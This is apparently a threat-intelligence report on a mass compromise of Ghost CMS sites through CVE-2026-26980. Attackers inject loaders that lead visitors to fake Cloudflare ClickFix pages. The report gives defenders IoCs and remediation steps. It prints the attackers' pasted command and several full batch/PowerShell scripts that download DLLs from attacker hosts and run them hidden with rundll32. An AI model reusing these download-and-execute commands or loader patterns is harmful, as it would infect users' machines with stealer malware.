ClickFix

Ghost CMS Mass Compromised via CVE-2026-26980, Now Fueling ClickFix Attacks

Alex.Turing, Wang Hao, huxin, rootkiter, Acey9

16 min read

Background

On May 7, 2026, XLab detected a poisoning incident targeting Ghost CMS belonging to one of important clients. The attacker exploited the high-risk SQL injection vulnerability CVE-2026-26980 in Ghost CMS to obtain the target site's Admin API Key without authorization, and then used the Ghost Admin API to tamper with articles in bulk, injecting malicious JavaScript loaders at the bottom of the pages to assist FakeCaptcha attacks — that is, by forging Cloudflare human verification pages to lure users into executing malicious commands locally.

After an in-depth investigation and analysis, we determined that this was not a targeted intrusion against the customer, but rather a large-scale poisoning campaign by an in-the-wild attack group targeting Ghost CMS. Although CVE-2026-26980 was publicly disclosed as early as February 19, a large number of users did not patch and upgrade in time, providing an opportunity for attackers. At least two groups are currently actively conducting such poisoning operations, and some sites have even become the target of competition between the two parties, with different malicious code being implanted one after another within a single day.

Ghost CMS Poisoning Incident Timeline
Ghost CMS Poisoning Incident Timeline

Through proactive detection of page poisoning characteristics, we have cumulatively identified more than 700 domains that have been contaminated, including several globally renowned sites, covering multiple industries such as universities, blockchain, AI / SaaS, security research, media, and fintech.

ghostcmd_victim.png

Undoubtedly, users' natural trust in these Ghost sites will greatly increase the success rate of ClickFix-type attacks. In the first wave of attacks, the Cloaking domain in the attack chain used Cloudflare's proxy service, which left an effective interception window for Cloudflare. It is very likely that users saw abnormal prompt boxes on poisoned sites and reported the relevant websites, ultimately prompting Cloudflare to block the Cloaking domain clo4shara[.]xyz used by the attacker at the time, cutting off the attack chain and to some extent mitigating the impact of this poisoning incident.

However, on May 16, we found that the attacker had updated their Cloaking domain (the new domain being com-apps[.]cc, which had not yet been intercepted by Cloudflare at the time) and upgraded the final payload to a stealer trojan with zero detections on VT.

ghostcmd_cfblock.png

Since May 10, we have been sending security notifications to victims one after another. Although some enterprises have responded and initiated remediation work, the vast majority of notifications have so far received no response at all. We believe that, whether from the current infection situation or future potential risks, such poisoning activities should not be ignored.

  • From the current infection situation, the attacker only needs to move the Cloaking domain out of Cloudflare's service, and the attack chain can resume normal operation, with the infected domains immediately becoming accomplices to ClickFix attacks.
  • From the perspective of future potential risks, the Ghost CMS credentials and configuration style collected this time may be used by attackers for lateral penetration against other business systems of the same infected entity; in addition, other sites that have not yet been infected but use Ghost CMS are also under threat, as attackers are fully capable of using the same methods to launch attacks against them.

On May 17, while conducting a new round of mapping of contaminated sites, we were surprised to find that more and more well-known websites (such as Harvard University, Oxford University, Auburn University, etc.) had been affected, and we also discovered the malicious code of a second attack group. Clearly, in-the-wild poisoning attacks are on the rise, and more and more Ghost sites that have not been upgraded are on the verge of being infected. We have decided to publicly report this incident to the security community, strongly recommending that all users of Ghost CMS immediately complete system upgrades and, based on the characteristic information provided in this article, actively conduct self-inspection and remediation work.

ghostcmd_harvard.jpg

Scope of Impact

Through feature scanning of publicly accessible pages, we have cumulatively identified more than 700 poisoned victim domains, and have proactively contacted the sites for which contact information could be obtained, notifying them of the poisoning. The following are the categorized statistical results of the victim domains derived based on AI-assisted analysis.

Industry Category Count Percentage Representative Entries
Personal Blog / Independent Site 368 48.1% aad****ie.com, aba***on.com, abou*****te.me
Software Development / SaaS / Tech Blog 113 14.8% 0x4***.dev, better****.dev, blog.al***.team
Other / Unclassified 97 12.7% 123mi****.com, 200**.com.br, abrahamkr*******o.dev
AI / Machine Learning 35 4.6% aibu***.software, aigra****.com, thin***.ai
Web3 / Cryptocurrency 22 2.9% blog.celes***.org, blog.go***.network, insights.blocko*******.co
Education / Academia 21 2.7% jcr.new.**.**.uk, ehc.au****.edu, blog.euro*******.eu
Media / News / Publishing 19 2.5% cubano******21.com, kangla****.com, hamb***1.de
Nonprofit / Religion / Community 16 2.1% bharat*******.org, stjohns****.org, christiansof*******d.com
Art / Design / Photography 12 1.6% andrew***.art, annika*******.art, billke*****tos.org
Security / Cybersecurity 11 1.4% blog.bug****.co, blog.rev***.ai, nixha***.com
Travel / Food / Lifestyle 10 1.3% bayview******.ca, japanj****.com, delftc***.co.nz
Health / Medical / Fitness 9 1.2% bakerinstitutefor*******n.org, almostth*****ess.com
Gaming / Sports / Entertainment 6 0.8% blog.biosteel*****.com, movies*****.com, 8bitr****.com
Finance / Fintech 6 0.8% blog.tw***.pl, blog.investan*****.com
Agriculture / Agritech 5 0.7% 2754.tar****.ie, agrighg-tool.th*****.de
E-commerce / Retail / Marketplace 5 0.7% blog.cotton******.com, barbie****.com, acqu***.marketing
Audio/Video / Podcast / Music 5 0.7% alth**.fm, amokpo****.com, heroes*****.com
Automotive / Modification 3 0.4% mqb-ret*****.com, 944res***.com
Legal 2 0.3% audio*******er.com, atechbroreads********rt.com

Incident Timeline

  • 2026-02-16: Compilation timestamp of the installer.dll used in the attack
  • 2026-05-07: XLab detected page poisoning characteristics on Ghost sites and began tracing the source
  • 2026-05-08: The attacker updated update.bat and updated the download chain
  • 2026-05-10: First Round of Compromised Site Enumeration Completed: 156 victim domains confirmed.
  • 2026-05-16: Cloaking domain updated, delivering a new installer.dll
  • 2026-05-17: Second Round of Compromised Site Enumeration Completed: 700+ victim domains confirmed; new threat actor identified.

Vulnerability Background: CVE-2026-26980

CVE-2026-26980 is a high-risk SQL injection vulnerability in Ghost CMS. Without any authentication, an attacker can directly read the database contents through this vulnerability, including the Admin API Key used to call the Ghost Admin API.

There are two types of keys in Ghost's API system:

  • Content API Key: Read-only by default, used only by the frontend to read published content
  • Admin API Key: Has management permissions over articles, themes, users, etc., and can call interfaces such as PUT /ghost/api/admin/posts/:id/ to directly modify articles

In this incident, what the attackers stole was the Admin API Key, which is also the fundamental prerequisite for their ability to tamper with article content in bulk.

Attack Chain Overview

The entire attack process has obvious five-stage characteristics of "CMS Takeover → Page Poisoning → Two-stage Loading → Social Engineering Lure (FakeCaptcha/ClickFix) → Malware Delivery", and the entire process is highly automated: bulk vulnerability scanning → automatic key extraction → bulk injection → dynamic C2 distribution.

cve_2026_26980.png

Stage 1: Injecting Malicious JavaScript at the End of Articles

After successfully obtaining the Admin API Key of the target site, the attacker modifies the article content through the Ghost Admin API, inserting malicious code at the bottom of the article. The malicious code we captured can be analyzed in two versions, with consistent core functionality, except that the new version optimizes the loading logic by using the browser's localStorage to ensure that the subsequent code is executed only once in the current browser.

Old Version

ghostcmd_loader_old.png

New Version

ghoscmd_loader_new.png

Code behavior analysis:

Behavior Description
atob("aHR0cHM6Ly9jbG80c2hhcmEueHl6LzExejc3dTMucGhw") Base64 decodes to https://clo4shara[.]xyz/11z77u3.php
d += a.search.substring(1) Passes the current page query string to C2, facilitating segmented delivery by utm / refid
c.id = btoa(a.origin) Sets base64(origin) as the id for the injected <script> tag, allowing the C2 server to identify each victim site (a unified fingerprint for multi-site poisoning)
b.appendChild(c) Dynamically creates and loads the remote script in the victim's browser

This is a typical two-stage loader: the first stage is a thin loader fixedly written into the database, and the real payload is returned on demand by clo4shara[.]xyz/11z77u3.php.

The benefits of this design for the attacker are very obvious:

  • Switching payload content (phishing redirect / information stealing / mining / browser 0day / activation only under specific geography or UA) does not require re-invading the site at all
  • Once discovered, the C2 can "go silent first" and then "revive", bypassing signature matching based on payload content
  • The same loader can be reused across multiple compromised sites, with the C2 side identifying the source via the btoa(origin) identifier

Stage 2: Two-stage Cloaking Script, Redirecting to Forged Verification Page

Directly accessing clo4shara[.]xyz/11z77u3.php reveals a piece of code, which is actually a typical traffic distribution script. Its core function is to collect various fingerprint information from the user's browser and upload it to the server, then perform actions such as redirection, popups, and downloads based on the returned instructions. After analysis, we believe that this PHP script was not independently developed by the attackers, but rather originates from the commercial Cloaking service provider Adspect. In malicious scenarios, Cloaking technology enables websites to dynamically switch content based on the visitor's identity: real victims will receive the malicious payload, while security researchers or crawlers will only see a harmless "safe page".

1. Environmental Fingerprint Collection

By collecting fingerprint information from multiple dimensions such as browser, system, and hardware (such as WebGL graphics card model, Navigator properties, time zone, touch event support, whether the console has been tampered with, etc.), a unique identifier of the browser environment is constructed and reported to the server to determine whether the request is from a real victim.

ghostcmd_fingerprint.png

2. Remote Control

Supports 19 different instructions including local, fetch, proxy, 301–307 status codes, iframe, form, php, js, etc., capable of executing arbitrary JavaScript code, allowing the attacker to fully control the victim's browser.

ghostcmd_main.png

In practice, when a real victim accesses 11z77u3.php, the returned windows_adata-related code is shown below. At this point, the script executes the iframe instruction, causing the browser to load the next-stage page cloud-verification[.]com via iframe.

window._adata = {
  "ok": true,
  "action": "iframe",
  "cid": "69fca6a9ad57095d",
  "js": false,
  "target": "https://cloud-verification[.]com"
};

From the user's perspective, the phenomenon is that the browser displays a Cloudflare "human verification" page asking to Verify you are human.

Forged Cloudflare verification page

Stage 3: ClickFix Social Engineering Attack

The page mentioned in the previous chapter is a highly counterfeit Cloudflare "human verification" page. When the user clicks "Verify", the page further guides the user to complete the following three specific steps in order to pass verification. This is actually the currently very popular Fake CAPTCHA attack method, using social engineering to lure users into completing the delivery and execution of malware.

  1. Use the WIN+R shortcut to open the command window
  2. Use Ctrl+V to paste the command
  3. Press Enter to execute the command.

FakeCAPTCHA social engineering page

Inexperienced readers might say: "This doesn't look malicious at all?" In fact, the trick lies in setTimeout. It sets a function that will execute with a delay of at least 500 milliseconds after the page is visited, used to secretly download malicious files in the background, with the download address being https://cloud-verification[.]com/update.zip. If the user's browser does not have "download notification" enabled, the entire process will be completed without any awareness.

ghostcmd_clickfix.png
The command that the user copies via Ctrl+V comes from the dropper. Decoding it from base64 yields the following, whose function is to launch and execute the downloaded update.zip malicious payload.

cmd /c "move %USERPROFILE%\Downloads\update.zip %TEMP%\u.zip 
&& tar -xf %TEMP%\u.zip -C %TEMP% 
&& start /min "" %TEMP%\update.bat" 
& REM
* I am not a robot reCAPTCHA Verification ID:2771
Operation Description
move update.zip Moves the archive from the download directory to a temporary directory
tar -xf Extracts the ZIP file
start /min update.bat Silently executes the malicious batch with a minimized window
REM * I am not a robot... Disguised as a reCAPTCHA verification code to lower the user's vigilance

Stage 4: Payload Delivery

So far, we have captured the following 4 different download addresses, which can be divided into two major categories: update.zip and NotepadPlugPlus.zip. The malicious code of the update.zip category is stored in update.bat.

  • jalwat[.]com/static/uploads/campaigns/6/update.zip
  • cloud-verification[.]com/update.zip
  • com-apps[.]cc/update.zip
  • com-apps[.]cc/NotepadPlusPlus.zip

ghostcmd_updatebat.png

May 7: update.bat from jalwat[.]com

@echo off
powershell -W 1 -C "$f=$env:Temp+'\installer.dll'; iwr 'https://link.storjshare[.]io/raw/jwqiycdezuj5gpqsyqn3damxbhgq/000/supman/installer.dll' -OutFile $f;  Start-Process rundll32 -ArgumentList  $f,'Begin' -Window Hidden"
start "" "https://youtube.com"

May 8: update.bat from cloud-verificatoin[.]com

@echo off
powershell -W 1 -C "$f=$env:Temp+'\installer.dll'; iwr 'https://link.storjshare[.]io/raw/jwl6ukpgv3mronv4ik2atzxsfxzq/sup/installer.dll' -OutFile $f;  Start-Process rundll32 -ArgumentList  $f,'Begin' -Window Hidden"
start "" "https://wl[.]gl/supp.jpg"
exit

May 9: update.bat from com-apps[.]cc

@echo off
powershell -W 1 -C "$f=$env:Temp+'\publl.dll'; iwr 'https://t[.]ly/docreport09052026.pdf' -OutFile $f;  Start-Process rundll32 -ArgumentList  $f,'Begin' -Window Hidden"
start "" "https://bc[.]ax/Supp.html"
exit

Their core logic is the same: download a DLL file from the Storj public CDN, call the exported function Begin via rundll32 with a hidden window, and then open a disguised page to distract the user.

Decoy image

NotepadPlusPlus.zip differs slightly: on May 16, the archive contained a cmd file; two days later, it became a js file.

ghostcmd_notepad.png

May 16: NotepadPlusPlus.cmd from com-app[.]cc

@echo off
setlocal
if not "%1"=="am_admin" (powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c %~f0 am_admin' -WindowStyle Minimized" & exit /b)
mode con: cols=1 lines=1
powershell -WindowStyle Hidden -Command ^
"$dll = '%APPDATA%\Microsoft\Windows\NotepadPlusPlus.dll'; ^
Invoke-WebRequest 'https://taketwolabs[.]com/wp-content/NotepadPlusPlus.dll' -OutFile $dll -UseBasicParsing; ^
Start-Process rundll32 -ArgumentList $dll, 'Begin' -WindowStyle Hidden"
exit

May 18: NotepadPlugPlus.js from com-app[.]cc

ghostcmd_notepadjsfile.png
Their functions are also for downloading, except that the cmd is used to download the next-stage payload NotepadPlusPlus.dll, while the js is used to download the final-stage payload UtilifySetup.exe.

Sample Analysis: installer.dll & notepadplusplus.js

The bat or cmd files mentioned above are all used to download the next-stage DLL file. Although different scripts use names such as publl.dll, NotepadPlusPlus.dll, etc., the PDB information in the sample shows that the real name of this DLL is installer. Currently, we have only captured two installer.dll samples, corresponding to two different stages.

ghostcmd_installerpdb.png

Stage 1: May 7 to May 9

MD5:    5659292833ec421da11ebde005d9c9a8
Compiled Timestamp: 2026-02-16 18:19:13
Language:    Rust
PDB: installer.pdb

Behavioral flow:

  1. Creates a randomly named folder under %TEMP%
  2. Downloads the next-stage sample from https://wl[.]gl/sup.exe and saves it
  3. Launches sup.exe using cmd

The final retrieved sup.exe is a PuTTY client carrying a valid code signing certificate, and this link is now invalid. We judge that this stage is very likely just a test / statistical delivery, used to verify the feasibility and conversion rate of the entire poisoning chain. The core basis for this judgment is:

  • The loader itself does not perform any persistence
  • The downloaded payload does not perform any malicious behavior

Stage 2: May 16 to present

MD5: d30cc10d54ebc967c8538ff74f442eee
Compiled Timestamp: 2026-05-16 04:04:55
Language: Rust
PDB: installer.pdb

Its function is the same as the first-stage installer.dll, which is to download and execute the next-stage payload UtilifySetup.exe from the address amazonbusketss-535659318049-us-west-1-an.s3.us-west-1.amazonaws[.]com/UtilifySetup.exe.

ghostcmd_dlurl.png

As discussed earlier, NotepadPlusPlus.zip includes two forms: cmd/js. It is known that notepadPlusPlugs.cmd is used to download installer.dll, so what is the purpose of notepadPlusPlus.js?

MD5:ec5dfee13abf94e08d0f94e90b527db0
Language: JavaScript

After deobfuscating notepadPlusPlus.js, it is not difficult to see that its function is also to download and execute the next-stage payload UtilifySetup.exe.

ghostcmd_notepadjs.png

Sample Analysis: UtilifySetup.exe

UtilifySetup.exe is an installation file packaged with Inno Setup. After execution, it will be extracted to the %appdata%\local\SuperMaxionQuickMaxlite directory.

MD5: 18a7251ddde77ed24bc54700d84d9be1
SHA1: 9434fe686801742ef7d6da248fb0b900dc32208a
Compiled TimeStamp: 2026-02-11 19:40:27
Type: Inno Setup

fake_grape.png

This is actually an Electron program. After unpacking the asar, you can see that the source code comes from the open-source Grape application on GitHub.

ghostcmd_asar.png

This file has 0 detections on VT — could it be another test program? The answer is no. After analysis, we found that the attacker replaced the original entry file with a malicious index.js.

ghostcmd_index.png

After deobfuscation, it is not difficult to see that it uses the setLoginItemSettings API built into the Electron framework to achieve persistence; every 30 seconds, it sends a POST request to the remote server web-telegram[.]ug, waiting for the retrieval instructions it issues, which can execute arbitrary js code or run executable files.

ghostcmd_indexfunc.png

Another Attack Group

During our investigation, we found that some victims were attacked a second time. Taking bitsy.ai as an example, it was on the first victim list on May 10, but was not on the second batch list on May 17. We were initially happy about bitsy.ai's remediation actions, but upon inspection, we found that although it had cleaned up the previous scripts, it had been implanted with another type of malicious script. This script uses simple reverse for obfuscation, and the restored next-stage JavaScript script address is https://staticcloudflare[.]pro/api/css.js.

ghostcmd_newjs1.png

Taking the Harvard International Review as another example, on April 23 there was a public analysis report about it being hacked for ClickFix attacks, with the IOC involved being script-dev[.]digital. The article did not provide the malicious script, but through tracing we found the following script, whose restored next-stage JavaScript script address is https://script-dev[.]digital/api/css.js.

ghostcmd_newjs3.png

The two domains staticcloudflare[.]pro and script-dev[.]digital use the same /api/css.js URI pattern, and both have resolved to 144.31.236.66. It is easy to judge that the two belong to the same attack group.

ghostcmd_actor2.png

And by May 16, we found that the Harvard International Review had been implanted with the malicious script from this campaign. After Base64 decoding the string aHR0cHM6Ly9jb20tYXBwcy5jYy8xMXo3N3UzLnBocA==, it is precisely the new Cloaking script address https://com-apps[.]cc/11z77u3.php.

ghostcmd_harvard_actor1.png

Most interestingly, just 1 day later, another attack group cleared the above code and implanted the same malicious script as bitsy.ai. We can't help but lament that Harvard International Review, a rather serious site, was so wantonly toyed with by two attack groups.

ghostcmd_harvard_actor2.png

The Ctrl+V code on this attack group's ClickFix page is shown below. The core part is $d, which can be seen to be a hexadecimal string, encrypted with XOR, with the key h2QHiVI.

ghostcmd_newclickcode.png

The decrypted code is shown below. Its function is to download and execute the next-stage payload. The address is Base64-encoded as aHR0cHM6Ly9jZG51cGRhdGVuZXdzLnRvcC9kbD9maWQ9Mzg=, which decodes to https://cdnupdatenews[.]top/dl?fid=38. Unfortunately, we did not capture this payload and cannot further analyze the ultimate intent of this attacker.

ghostcmd_decclickcode.png

This article does not conduct an in-depth analysis of this attacker for the time being, only providing some threat intelligence. Tracing through the specific URI /api/css.js, nearly 500 suspicious domains can be found on VT, some of which are linked to Aeternum.

ghostcmd_uri.png

Self-Inspection and Detection Methods

Site Side (Ghost Operations)

  1. Check article content: Whether it contains any of the following fingerprints
    • The string sj.ssc/ipa/ or ghost_once_footer_
    • The strings atob( and appendChild appearing together in the article body
    • The string btoa(a.origin)
  2. Check Ghost backend logs: Whether there are abnormal PUT /ghost/api/admin/posts/:id/ requests, especially those from unfamiliar IPs, abnormal UAs, or bulk modifications in a short period of time
  3. Check Code Injection configuration items and theme files: Whether additional <script> tags have been implanted
  4. Check the API Key list: Whether there are unknown or long-unused Admin API Keys

User Side / Browsing Side

  • Whether you have been led to fake verification pages such as cloud-verification[.]com or com-apps[.]cc

  • Whether your download history contains jalwat[.]com, taketwolabs[.]com, com-apps[.]cc, or cloud-verification[.]com

Remediation Recommendations

We strongly recommend that Ghost CMS users perform the following remediation operations. If you are interested in our research or need help, you can contact us via X platform.

  1. Urgently upgrade Ghost CMS to the official version that has fixed CVE-2026-26980
  2. Rotate all credentials: Admin API Key, Content API Key, administrator password, Session
  3. Clean up implanted content: At the database level (not just the backend editor), bulk-remove <script> code segments in articles that match the above fingerprints
  4. Audit access logs: Retain at least 30 days of Admin API call logs, and use IoCs for retrospective investigation
  5. Notify users: Recommend that all users who may have visited the site during the contamination period perform local security checks

IoC

Threat Actor A

clo4shara[.]xyz
cloud-verification[.]com
jalwat[.]com
com-apps[.]cc
web-telegram[.]ug


https://clo4shara[.]xyz/11z77u3.php
https://com-apps[.]cc/11z77u3.php
https://platecrumbs[.]com/11z77u3.php
https://cloud-verification[.]com/update.zip
https://com-apps[.]cc/update.zip
https://com-apps[.]cc/NotepadPlusPlus.zip
https://jalwat[.]com/static/uploads/campaigns/6/update.zip
https://taketwolabs[.]com/wp-content/NotepadPlusPlus.dll

Threat Actor B

staticcloudflare[.]pro
script-dev[.]buzz
updatesecurity[.]pro
updatefilescf[.]top
static-file[.]digital
download-file[.]today
updatefile-cf[.]dgital
script-dev[.]digital
updatefile-cf[.]top
script-dev[.]xyz



https://staticcloudflare[.]pro/api/css.js
https://script-dev[.]digital/api/css.js
https://cdnupdatenews[.]top/dl?fid=38

Sample MD5

5659292833ec421da11ebde005d9c9a8 installer.dll
d30cc10d54ebc967c8538ff74f442eee *NotepadPlusPlus.dll
18a7251ddde77ed24bc54700d84d9be1 *UtilifySetup.exe_
f280e12f51f996dae7fffc64a56ee527 *SuperAppizeSetup.msi
fceca579efcef09eb507c6ca977ea281 *css.js_

Injected code characteristics

#Threat Actor1

"ghost_once_footer_"

#Threat Actor2

"sj.ssc/ipa/"